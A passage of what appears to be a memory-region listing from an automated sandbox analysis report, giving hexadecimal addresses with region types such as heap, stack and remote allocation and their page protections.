page read and write
|
||
|
15274970000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
1527698F000
|
heap
|
page read and write
|
||
|
4AB4000
|
heap
|
page read and write
|
||
|
4360000
|
trusted library allocation
|
page read and write
|
||
|
1080000
|
unkown
|
page readonly
|
||
|
2016B000
|
stack
|
page read and write
|
||
|
152768FD000
|
heap
|
page read and write
|
||
|
1AE308AF000
|
trusted library allocation
|
page read and write
|
||
|
B70000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
7FF848EC6000
|
trusted library allocation
|
page read and write
|
||
|
46A0000
|
heap
|
page execute and read and write
|
||
|
24F0000
|
unkown
|
page readonly
|
||
|
4761000
|
heap
|
page read and write
|
||
|
15276784000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
D90000
|
unkown
|
page readonly
|
||
|
CF0000
|
unkown
|
page read and write
|
||
|
7E40000
|
trusted library allocation
|
page read and write
|
||
|
27A92000
|
system
|
page read and write
|
||
|
7D50000
|
trusted library allocation
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
7DC9000
|
heap
|
page read and write
|
||
|
8380000
|
direct allocation
|
page read and write
|
||
|
800000
|
unkown
|
page readonly
|
||
|
1527497A000
|
heap
|
page read and write
|
||
|
15274949000
|
heap
|
page read and write
|
||
|
DA5000
|
unkown
|
page read and write
|
||
|
15276990000
|
heap
|
page read and write
|
||
|
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
|
7A304F3000
|
stack
|
page read and write
|
||
|
7FF848EF6000
|
trusted library allocation
|
page execute and read and write
|
||
|
780000
|
unkown
|
page readonly
|
||
|
2C73000
|
heap
|
page read and write
|
||
|
7A3057D000
|
stack
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
E54000
|
system
|
page execute and read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
15274983000
|
heap
|
page read and write
|
||
|
1FC10000
|
direct allocation
|
page read and write
|
||
|
1FC70000
|
direct allocation
|
page read and write
|
||
|
6E5E000
|
stack
|
page read and write
|
||
|
15276330000
|
heap
|
page read and write
|
||
|
4B7E000
|
stack
|
page read and write
|
||
|
7FF849180000
|
trusted library allocation
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
20700000
|
direct allocation
|
page execute and read and write
|
||
|
CD0000
|
heap
|
page read and write
|
||
|
2FAE000
|
stack
|
page read and write
|
||
|
1AE31843000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
29EE000
|
stack
|
page read and write
|
||
|
2A42000
|
unkown
|
page read and write
|
||
|
56B1000
|
trusted library allocation
|
page read and write
|
||
|
7DC4000
|
heap
|
page read and write
|
||
|
2C8E000
|
stack
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
56D9000
|
trusted library allocation
|
page read and write
|
||
|
BDB79FB000
|
stack
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
2EF0000
|
heap
|
page read and write
|
||
|
1AE400E1000
|
trusted library allocation
|
page read and write
|
||
|
4B00000
|
heap
|
page readonly
|
||
|
2D7C000
|
heap
|
page read and write
|
||
|
2D36000
|
heap
|
page read and write
|
||
|
780000
|
heap
|
page read and write
|
||
|
B70000
|
heap
|
page read and write
|
||
|
2950000
|
unkown
|
page readonly
|
||
|
1FC40000
|
direct allocation
|
page read and write
|
||
|
D9E000
|
unkown
|
page readonly
|
||
|
4761000
|
heap
|
page read and write
|
||
|
D20000
|
unkown
|
page readonly
|
||
|
880000
|
unkown
|
page read and write
|
||
|
152768CE000
|
heap
|
page read and write
|
||
|
15276914000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
8102000
|
heap
|
page read and write
|
||
|
4770000
|
heap
|
page read and write
|
||
|
B80000
|
unkown
|
page readonly
|
||
|
15274933000
|
heap
|
page read and write
|
||
|
2CB0000
|
heap
|
page read and write
|
||
|
2D25000
|
heap
|
page read and write
|
||
|
152768C8000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
F51000
|
unkown
|
page readonly
|
||
|
2D29000
|
heap
|
page read and write
|
||
|
15274983000
|
heap
|
page read and write
|
||
|
810000
|
heap
|
page read and write
|
||
|
711E000
|
stack
|
page read and write
|
||
|
1AE484FA000
|
heap
|
page read and write
|
||
|
D9E000
|
unkown
|
page readonly
|
||
|
4761000
|
heap
|
page read and write
|
||
|
29A4000
|
heap
|
page read and write
|
||
|
6F1B000
|
heap
|
page read and write
|
||
|
D90000
|
unkown
|
page readonly
|
||
|
15274968000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
71DE000
|
stack
|
page read and write
|
||
|
843D000
|
heap
|
page read and write
|
||
|
4E02000
|
direct allocation
|
page execute and read and write
|
||
|
A80000
|
heap
|
page read and write
|
||
|
15274945000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
15276C10000
|
heap
|
page read and write
|
||
|
28BD000
|
stack
|
page read and write
|
||
|
1AE48907000
|
heap
|
page read and write
|
||
|
6EEB000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
2C68000
|
heap
|
page read and write
|
||
|
2006F000
|
stack
|
page read and write
|
||
|
4D1E000
|
stack
|
page read and write
|
||
|
790000
|
unkown
|
page readonly
|
||
|
2C73000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
152768CD000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
580E000
|
stack
|
page read and write
|
||
|
1FC50000
|
direct allocation
|
page read and write
|
||
|
5AC000
|
stack
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
6EFE000
|
heap
|
page read and write
|
||
|
6B6E000
|
stack
|
page read and write
|
||
|
2EA0000
|
trusted library allocation
|
page read and write
|
||
|
1527684D000
|
heap
|
page read and write
|
||
|
6E9E000
|
stack
|
page read and write
|
||
|
38F1000
|
unkown
|
page execute and read and write
|
||
|
2E40000
|
direct allocation
|
page read and write
|
||
|
BDB91FE000
|
stack
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
20391000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
7A305FF000
|
stack
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
152748CA000
|
heap
|
page read and write
|
||
|
85E000
|
stack
|
page read and write
|
||
|
817000
|
heap
|
page read and write
|
||
|
9608000
|
direct allocation
|
page execute and read and write
|
||
|
4C342F9000
|
stack
|
page read and write
|
||
|
7FF849160000
|
trusted library allocation
|
page read and write
|
||
|
15274983000
|
heap
|
page read and write
|
||
|
26AE7B2E000
|
system
|
page execute and read and write
|
||
|
26A4000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4D91000
|
direct allocation
|
page execute and read and write
|
||
|
A7C000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4C18000
|
heap
|
page read and write
|
||
|
6ED8000
|
trusted library allocation
|
page read and write
|
||
|
15274983000
|
heap
|
page read and write
|
||
|
801C000
|
stack
|
page read and write
|
||
|
959000
|
trusted library allocation
|
page read and write
|
||
|
6FDA000
|
heap
|
page read and write
|
||
|
152768C9000
|
heap
|
page read and write
|
||
|
6C2A000
|
stack
|
page read and write
|
||
|
1AE3054D000
|
trusted library allocation
|
page read and write
|
||
|
28F8000
|
heap
|
page read and write
|
||
|
975000
|
trusted library allocation
|
page execute and read and write
|
||
|
152748D1000
|
heap
|
page read and write
|
||
|
15274880000
|
heap
|
page read and write
|
||
|
F51000
|
unkown
|
page readonly
|
||
|
4E23000
|
unclassified section
|
page read and write
|
||
|
21291000
|
unclassified section
|
page execute and read and write
|
||
|
4BFE000
|
stack
|
page read and write
|
||
|
152748D0000
|
heap
|
page read and write
|
||
|
4707000
|
trusted library allocation
|
page read and write
|
||
|
1AE2E3B0000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4AB4000
|
heap
|
page read and write
|
||
|
2D32000
|
heap
|
page read and write
|
||
|
4F5F000
|
stack
|
page read and write
|
||
|
1AE4890D000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4F6B000
|
stack
|
page read and write
|
||
|
15274916000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
15276774000
|
heap
|
page read and write
|
||
|
18EA5910000
|
heap
|
page read and write
|
||
|
72E0000
|
trusted library allocation
|
page read and write
|
||
|
4C349FD000
|
stack
|
page read and write
|
||
|
72A0000
|
trusted library allocation
|
page read and write
|
||
|
2038C000
|
stack
|
page read and write
|
||
|
15276996000
|
heap
|
page read and write
|
||
|
7FF849030000
|
trusted library allocation
|
page read and write
|
||
|
524C000
|
stack
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
15276914000
|
heap
|
page read and write
|
||
|
15274972000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
5F0000
|
unkown
|
page readonly
|
||
|
1527699D000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
15274922000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4C5E000
|
direct allocation
|
page execute and read and write
|
||
|
23A91000
|
unclassified section
|
page execute and read and write
|
||
|
80AD000
|
stack
|
page read and write
|
||
|
6ED0000
|
trusted library allocation
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
27D6C000
|
system
|
page read and write
|
||
|
780000
|
unkown
|
page readonly
|
||
|
2C84000
|
heap
|
page read and write
|
||
|
840F000
|
stack
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
2D68000
|
heap
|
page read and write
|
||
|
6B2A000
|
stack
|
page read and write
|
||
|
15276773000
|
heap
|
page read and write
|
||
|
26AE9901000
|
trusted library allocation
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
2C50000
|
heap
|
page read and write
|
||
|
595C000
|
trusted library allocation
|
page read and write
|
||
|
4ABC000
|
stack
|
page read and write
|
||
|
82CD000
|
stack
|
page read and write
|
||
|
7A308FE000
|
stack
|
page read and write
|
||
|
204B6000
|
heap
|
page read and write
|
||
|
8440000
|
heap
|
page read and write
|
||
|
F88000
|
heap
|
page read and write
|
||
|
860000
|
unkown
|
page read and write
|
||
|
1AE403DA000
|
trusted library allocation
|
page read and write
|
||
|
46B1000
|
trusted library allocation
|
page read and write
|
||
|
42F1000
|
unkown
|
page execute and read and write
|
||
|
2C73000
|
heap
|
page read and write
|
||
|
441D000
|
stack
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
ABE000
|
heap
|
page read and write
|
||
|
805B000
|
stack
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
B40000
|
unkown
|
page readonly
|
||
|
4761000
|
heap
|
page read and write
|
||
|
7FF848FCA000
|
trusted library allocation
|
page read and write
|
||
|
1527490F000
|
heap
|
page read and write
|
||
|
7E0F000
|
stack
|
page read and write
|
||
|
943000
|
trusted library allocation
|
page execute and read and write
|
||
|
7E20000
|
trusted library allocation
|
page execute and read and write
|
||
|
2E00000
|
direct allocation
|
page read and write
|
||
|
CB0000
|
unkown
|
page read and write
|
||
|
9EA000
|
heap
|
page read and write
|
||
|
B80000
|
unkown
|
page readonly
|
||
|
DA7000
|
unkown
|
page readonly
|
||
|
1AE3070A000
|
trusted library allocation
|
page read and write
|
||
|
27B52000
|
system
|
page read and write
|
||
|
15276991000
|
heap
|
page read and write
|
||
|
7A30BBE000
|
stack
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
26AE9814000
|
trusted library allocation
|
page read and write
|
||
|
2941000
|
heap
|
page read and write
|
||
|
4B89000
|
heap
|
page read and write
|
||
|
7A31B8B000
|
stack
|
page read and write
|
||
|
15276914000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
C90000
|
unkown
|
page read and write
|
||
|
15274954000
|
heap
|
page read and write
|
||
|
1AE31F36000
|
trusted library allocation
|
page read and write
|
||
|
29A4000
|
heap
|
page read and write
|
||
|
7DF4984F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
D50000
|
heap
|
page read and write
|
||
|
1AE485F0000
|
heap
|
page read and write
|
||
|
26AE7B2B000
|
system
|
page execute and read and write
|
||
|
4760000
|
heap
|
page read and write
|
||
|
4BBE000
|
stack
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
6C30000
|
heap
|
page read and write
|
||
|
4780000
|
heap
|
page read and write
|
||
|
2C68000
|
heap
|
page read and write
|
||
|
6A60000
|
direct allocation
|
page read and write
|
||
|
44D0000
|
heap
|
page read and write
|
||
|
7FF849080000
|
trusted library allocation
|
page read and write
|
||
|
D91000
|
unkown
|
page execute read
|
||
|
15274974000
|
heap
|
page read and write
|
||
|
1AE2E4ED000
|
heap
|
page read and write
|
||
|
4AFE000
|
stack
|
page read and write
|
||
|
15274994000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
72B0000
|
trusted library allocation
|
page read and write
|
||
|
4CF1000
|
unkown
|
page execute and read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
2C79000
|
heap
|
page read and write
|
||
|
7D43000
|
heap
|
page read and write
|
||
|
152748EE000
|
heap
|
page read and write
|
||
|
200EF000
|
stack
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
7DCE000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
49C0000
|
trusted library allocation
|
page read and write
|
||
|
1AE30162000
|
trusted library allocation
|
page read and write
|
||
|
2940000
|
heap
|
page read and write
|
||
|
890000
|
heap
|
page read and write
|
||
|
1AE2E439000
|
heap
|
page read and write
|
||
|
26AE9700000
|
trusted library allocation
|
page read and write
|
||
|
1AE48909000
|
heap
|
page read and write
|
||
|
15276C10000
|
heap
|
page read and write
|
||
|
C90000
|
unkown
|
page read and write
|
||
|
7D27000
|
stack
|
page read and write
|
||
|
DA5000
|
unkown
|
page read and write
|
||
|
AF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
F5DC6FF000
|
stack
|
page read and write
|
||
|
2D0A000
|
heap
|
page read and write
|
||
|
4BE9000
|
direct allocation
|
page execute and read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
739B000
|
stack
|
page read and write
|
||
|
7FF849110000
|
trusted library allocation
|
page read and write
|
||
|
4B17000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
A0F000
|
heap
|
page read and write
|
||
|
4770000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
678000
|
stack
|
page read and write
|
||
|
15274983000
|
heap
|
page read and write
|
||
|
3104000
|
unkown
|
page read and write
|
||
|
BDB89FE000
|
stack
|
page read and write
|
||
|
4388000
|
trusted library allocation
|
page read and write
|
||
|
468D000
|
stack
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4D4E000
|
stack
|
page read and write
|
||
|
2FEF000
|
stack
|
page read and write
|
||
|
2970000
|
heap
|
page read and write
|
||
|
A008000
|
direct allocation
|
page execute and read and write
|
||
|
880000
|
unkown
|
page read and write
|
||
|
950000
|
trusted library allocation
|
page read and write
|
||
|
15274971000
|
heap
|
page read and write
|
||
|
944000
|
trusted library allocation
|
page read and write
|
||
|
29A4000
|
heap
|
page read and write
|
||
|
1FF82AF0000
|
heap
|
page read and write
|
||
|
4860000
|
trusted library allocation
|
page read and write
|
||
|
D80000
|
unkown
|
page readonly
|
||
|
7FF848E1D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D40000
|
heap
|
page read and write
|
||
|
719E000
|
stack
|
page read and write
|
||
|
DA5000
|
unkown
|
page read and write
|
||
|
26AE9800000
|
trusted library allocation
|
page read and write
|
||
|
D90000
|
unkown
|
page readonly
|
||
|
4761000
|
heap
|
page read and write
|
||
|
1FC90000
|
direct allocation
|
page read and write
|
||
|
4A3E000
|
stack
|
page read and write
|
||
|
152768F8000
|
heap
|
page read and write
|
||
|
812A000
|
heap
|
page read and write
|
||
|
2F58000
|
remote allocation
|
page execute and read and write
|
||
|
6C50000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
26A0000
|
heap
|
page read and write
|
||
|
990000
|
trusted library allocation
|
page read and write
|
||
|
15276C00000
|
heap
|
page read and write
|
||
|
152748C9000
|
heap
|
page read and write
|
||
|
152768C9000
|
heap
|
page read and write
|
||
|
2C6A000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
152748E1000
|
heap
|
page read and write
|
||
|
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
1AE4891B000
|
heap
|
page read and write
|
||
|
2D20000
|
heap
|
page read and write
|
||
|
2C79000
|
heap
|
page read and write
|
||
|
26A4000
|
heap
|
page read and write
|
||
|
CB0000
|
unkown
|
page read and write
|
||
|
26AE7CE0000
|
heap
|
page read and write
|
||
|
B3C000
|
stack
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
80EC000
|
stack
|
page read and write
|
||
|
D50000
|
heap
|
page read and write
|
||
|
1AE30897000
|
trusted library allocation
|
page read and write
|
||
|
7A0000
|
unkown
|
page readonly
|
||
|
152748A8000
|
heap
|
page read and write
|
||
|
DA7000
|
unkown
|
page readonly
|
||
|
4761000
|
heap
|
page read and write
|
||
|
15276914000
|
heap
|
page read and write
|
||
|
26AE9812000
|
trusted library allocation
|
page read and write
|
||
|
2DA3000
|
heap
|
page read and write
|
||
|
1527491D000
|
heap
|
page read and write
|
||
|
4DDB000
|
stack
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
972000
|
trusted library allocation
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4765000
|
heap
|
page read and write
|
||
|
26AE99B2000
|
trusted library allocation
|
page read and write
|
||
|
3958000
|
remote allocation
|
page execute and read and write
|
||
|
15276771000
|
heap
|
page read and write
|
||
|
1527699B000
|
heap
|
page read and write
|
||
|
15276C0B000
|
heap
|
page read and write
|
||
|
7D41000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
455E000
|
stack
|
page read and write
|
||
|
4C344FE000
|
stack
|
page read and write
|
||
|
7FF849120000
|
trusted library allocation
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
20391000
|
heap
|
page read and write
|
||
|
1AE2FF48000
|
heap
|
page read and write
|
||
|
15274962000
|
heap
|
page read and write
|
||
|
2082D000
|
direct allocation
|
page execute and read and write
|
||
|
790000
|
unkown
|
page readonly
|
||
|
21222000
|
unclassified section
|
page execute and read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
26AE7D5F000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
1FF82B20000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4FDF000
|
stack
|
page read and write
|
||
|
D9E000
|
unkown
|
page readonly
|
||
|
57CF000
|
stack
|
page read and write
|
||
|
1AE4892E000
|
heap
|
page read and write
|
||
|
72C0000
|
trusted library allocation
|
page read and write
|
||
|
650000
|
heap
|
page read and write
|
||
|
1527678C000
|
heap
|
page read and write
|
||
|
7FF849000000
|
trusted library allocation
|
page execute and read and write
|
||
|
7D93000
|
heap
|
page read and write
|
||
|
18EA59F0000
|
heap
|
page read and write
|
||
|
29A4000
|
heap
|
page read and write
|
||
|
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
7290000
|
trusted library allocation
|
page read and write
|
||
|
A3A000
|
stack
|
page read and write
|
||
|
15274924000
|
heap
|
page read and write
|
||
|
4911000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
7D5A000
|
heap
|
page read and write
|
||
|
D54000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
7D48000
|
heap
|
page read and write
|
||
|
1AE40101000
|
trusted library allocation
|
page read and write
|
||
|
2F6F000
|
stack
|
page read and write
|
||
|
A88000
|
heap
|
page read and write
|
||
|
4640000
|
heap
|
page execute and read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
7FF848E14000
|
trusted library allocation
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
152768F0000
|
heap
|
page read and write
|
||
|
209CD000
|
direct allocation
|
page execute and read and write
|
||
|
15274952000
|
heap
|
page read and write
|
||
|
9DE000
|
stack
|
page read and write
|
||
|
1AE30060000
|
heap
|
page execute and read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
56CE000
|
stack
|
page read and write
|
||
|
201EE000
|
stack
|
page read and write
|
||
|
202BE000
|
stack
|
page read and write
|
||
|
4ED2000
|
unclassified section
|
page read and write
|
||
|
7A30A7E000
|
stack
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
1AE2E390000
|
heap
|
page read and write
|
||
|
49C0000
|
trusted library allocation
|
page read and write
|
||
|
7E2D000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
7E00000
|
heap
|
page read and write
|
||
|
2C3E000
|
stack
|
page read and write
|
||
|
1AE2E3F0000
|
heap
|
page read and write
|
||
|
1AE30885000
|
trusted library allocation
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
26AE9510000
|
trusted library allocation
|
page read and write
|
||
|
1AE3087D000
|
trusted library allocation
|
page read and write
|
||
|
7A3198E000
|
stack
|
page read and write
|
||
|
8DF000
|
stack
|
page read and write
|
||
|
7D99000
|
heap
|
page read and write
|
||
|
7FF848FF2000
|
trusted library allocation
|
page read and write
|
||
|
15274922000
|
heap
|
page read and write
|
||
|
6AA0000
|
direct allocation
|
page read and write
|
||
|
152768F5000
|
heap
|
page read and write
|
||
|
7FF848ED0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4C34CFB000
|
stack
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
7A0000
|
unkown
|
page readonly
|
||
|
15274939000
|
heap
|
page read and write
|
||
|
4764000
|
heap
|
page read and write
|
||
|
4E12000
|
unclassified section
|
page read and write
|
||
|
DA5000
|
unkown
|
page read and write
|
||
|
4D4F000
|
trusted library allocation
|
page read and write
|
||
|
6F7B000
|
heap
|
page read and write
|
||
|
4AA000
|
stack
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
7A30E3E000
|
stack
|
page read and write
|
||
|
1527493A000
|
heap
|
page read and write
|
||
|
2CFD000
|
stack
|
page read and write
|
||
|
18EA5B54000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
2E9E000
|
stack
|
page read and write
|
||
|
4B7A000
|
heap
|
page read and write
|
||
|
15274983000
|
heap
|
page read and write
|
||
|
4887000
|
heap
|
page read and write
|
||
|
152768E0000
|
heap
|
page read and write
|
||
|
15276908000
|
heap
|
page read and write
|
||
|
152768DD000
|
heap
|
page read and write
|
||
|
26AE7D5B000
|
heap
|
page read and write
|
||
|
7D87000
|
heap
|
page read and write
|
||
|
4A3E000
|
heap
|
page read and write
|
||
|
15274922000
|
heap
|
page read and write
|
||
|
26AE7D37000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
BDB81FD000
|
stack
|
page read and write
|
||
|
7FF848FC1000
|
trusted library allocation
|
page read and write
|
||
|
2054D000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
1527684D000
|
heap
|
page read and write
|
||
|
23091000
|
unclassified section
|
page execute and read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
80F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4C348FF000
|
stack
|
page read and write
|
||
|
7D93000
|
heap
|
page read and write
|
||
|
49C0000
|
trusted library allocation
|
page read and write
|
||
|
26AE7B00000
|
system
|
page execute and read and write
|
||
|
785000
|
heap
|
page read and write
|
||
|
9E0000
|
heap
|
page read and write
|
||
|
1AE30070000
|
heap
|
page execute and read and write
|
||
|
4F2F000
|
stack
|
page read and write
|
||
|
83B0000
|
direct allocation
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
5AC000
|
stack
|
page read and write
|
||
|
15274983000
|
heap
|
page read and write
|
||
|
7A309FE000
|
stack
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
6AEE000
|
stack
|
page read and write
|
||
|
1AE2E660000
|
heap
|
page read and write
|
||
|
7E7E000
|
stack
|
page read and write
|
||
|
2EA0000
|
heap
|
page read and write
|
||
|
56F1000
|
unkown
|
page execute and read and write
|
||
|
29A4000
|
heap
|
page read and write
|
||
|
4A8E000
|
stack
|
page read and write
|
||
|
1527679C000
|
heap
|
page read and write
|
||
|
2E90000
|
remote allocation
|
page execute and read and write
|
||
|
7D4B000
|
heap
|
page read and write
|
||
|
7D60000
|
trusted library allocation
|
page read and write
|
||
|
56C1000
|
trusted library allocation
|
page read and write
|
||
|
45C0000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
7DCD000
|
stack
|
page read and write
|
||
|
24B0000
|
unkown
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
7FF848FE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2CFE000
|
stack
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
21C91000
|
unclassified section
|
page execute and read and write
|
||
|
7D98000
|
heap
|
page read and write
|
||
|
152768E7000
|
heap
|
page read and write
|
||
|
430000
|
unkown
|
page readonly
|
||
|
152768C9000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
2950000
|
unkown
|
page readonly
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
15274A70000
|
heap
|
page read and write
|
||
|
15274971000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
1FF82B95000
|
heap
|
page read and write
|
||
|
8340000
|
trusted library allocation
|
page execute and read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
20829000
|
direct allocation
|
page execute and read and write
|
||
|
860000
|
unkown
|
page read and write
|
||
|
2027E000
|
stack
|
page read and write
|
||
|
1AE484CE000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
26AE7D62000
|
heap
|
page read and write
|
||
|
8F0000
|
heap
|
page read and write
|
||
|
4B89000
|
heap
|
page read and write
|
||
|
15276908000
|
heap
|
page read and write
|
||
|
1527679A000
|
heap
|
page read and write
|
||
|
7E80000
|
trusted library allocation
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
2D1C000
|
unkown
|
page read and write
|
||
|
6A50000
|
direct allocation
|
page read and write
|
||
|
15274913000
|
heap
|
page read and write
|
||
|
970000
|
trusted library allocation
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
152768DF000
|
heap
|
page read and write
|
||
|
7330000
|
trusted library allocation
|
page read and write
|
||
|
940000
|
trusted library allocation
|
page read and write
|
||
|
7E10000
|
heap
|
page read and write
|
||
|
6D0000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
200AE000
|
stack
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
30BE000
|
stack
|
page read and write
|
||
|
4D20000
|
direct allocation
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
7280000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D45000
|
heap
|
page read and write
|
||
|
7D9D000
|
heap
|
page read and write
|
||
|
7D30000
|
heap
|
page read and write
|
||
|
B60000
|
unkown
|
page readonly
|
||
|
15276794000
|
heap
|
page read and write
|
||
|
1AE312AF000
|
trusted library allocation
|
page read and write
|
||
|
6BED000
|
stack
|
page read and write
|
||
|
D90000
|
unkown
|
page readonly
|
||
|
2C73000
|
heap
|
page read and write
|
||
|
4B69000
|
heap
|
page read and write
|
||
|
15276C0B000
|
heap
|
page read and write
|
||
|
15276990000
|
heap
|
page read and write
|
||
|
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
|
152768CC000
|
heap
|
page read and write
|
||
|
7D3E000
|
heap
|
page read and write
|
||
|
590F000
|
stack
|
page read and write
|
||
|
50EC000
|
unclassified section
|
page read and write
|
||
|
930000
|
trusted library allocation
|
page read and write
|
||
|
2E60000
|
heap
|
page read and write
|
||
|
1080000
|
unkown
|
page readonly
|
||
|
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
|
1FC80000
|
direct allocation
|
page read and write
|
||
|
29A0000
|
heap
|
page read and write
|
||
|
1527684D000
|
heap
|
page read and write
|
||
|
7F30000
|
heap
|
